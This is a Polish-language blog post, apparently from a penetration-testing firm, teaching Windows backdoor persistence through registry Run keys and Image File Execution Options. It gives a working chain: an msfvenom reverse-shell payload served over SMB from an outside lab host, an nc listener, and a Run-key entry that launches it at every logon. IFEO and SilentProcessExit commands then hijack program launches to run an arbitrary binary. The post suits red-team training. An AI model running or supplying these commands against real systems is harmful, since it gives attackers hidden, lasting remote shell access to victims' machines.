Windows — podstawy tworzenia backdoorów— część II

Klucze typu Run

Popularną techniką zachowania dostępu do stacji roboczej jest wykorzystanie kluczy rejestru Run i RunOnce — niejednokrotnie wykorzystywane także przez złośliwe oprogramowanie (malware). W niniejszym punkcie skupimy się na pierwszym z nich. Klucz rejestru HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
pozwala na globalne wymuszenie autostartu, tzn. logowanie na jakiegokolwiek użytkownika systemu uruchomi program, na który wskazuje wpis w tym kluczu. Aby móc go modyfikować, należy posiadać uprawnienia co najmniej Administracyjne. Analogicznie, wpis w kluczu HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
pozwala na zapewnienie autostartu w kontekście uprawnień aktualnie zalogowanego użytkownika.

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.139.214 lport=8443 -f exe -o 8443.exe
smbserver.py -smb2support x .
nc -lvp 8443
reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run” /v WindowsSvc /d “cmd /c \\192.168.139.214\x\8443.exe” /t REG_SZ /f

Image File Execution Options

Ten przypadek będzie nieco inny od poprzednich — tego typu backdoor nie uruchomi się samoczynnie po starcie systemu, ale będzie zależny od włączenia innego programu. Z uwagi na fakt, że może to być dowolny program, celem może być np. przeglądarka internetowa. Mechanizmem, który wykorzystamy jest klucz rejestru zwany Image File Execution Options. Normalnie, umożliwia on dodanie debuggera, czyli programu służącego do obserwacji przebiegu działania innych aplikacji. Aby zobaczyć, jak klucz ten działa w praktyce posłużymy się programem Process Hacker oraz natywnym komponentem systemu Windows — regedit.exe, czyli przeglądarką rejestru. Ponownie skorzystamy z setupu z poprzedniego przypadku, tym razem jednak zanim zainstalujemy właściwy backdoor, przechodzimy na maszynę Windows aby wykonać prosty test mechanizmu IFEO. Uruchamiamy program cmd.exe jako użytkownik administracyjny i wpisujemy polecenie

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe” /v Debugger /d notepad.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\binary.exe"

--

--

If you’re looking for the good guys who are ready and able to hack you, need look no further. We professionally find vulnerabilities before the bad guys do.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
AFINE

AFINE

If you’re looking for the good guys who are ready and able to hack you, need look no further. We professionally find vulnerabilities before the bad guys do.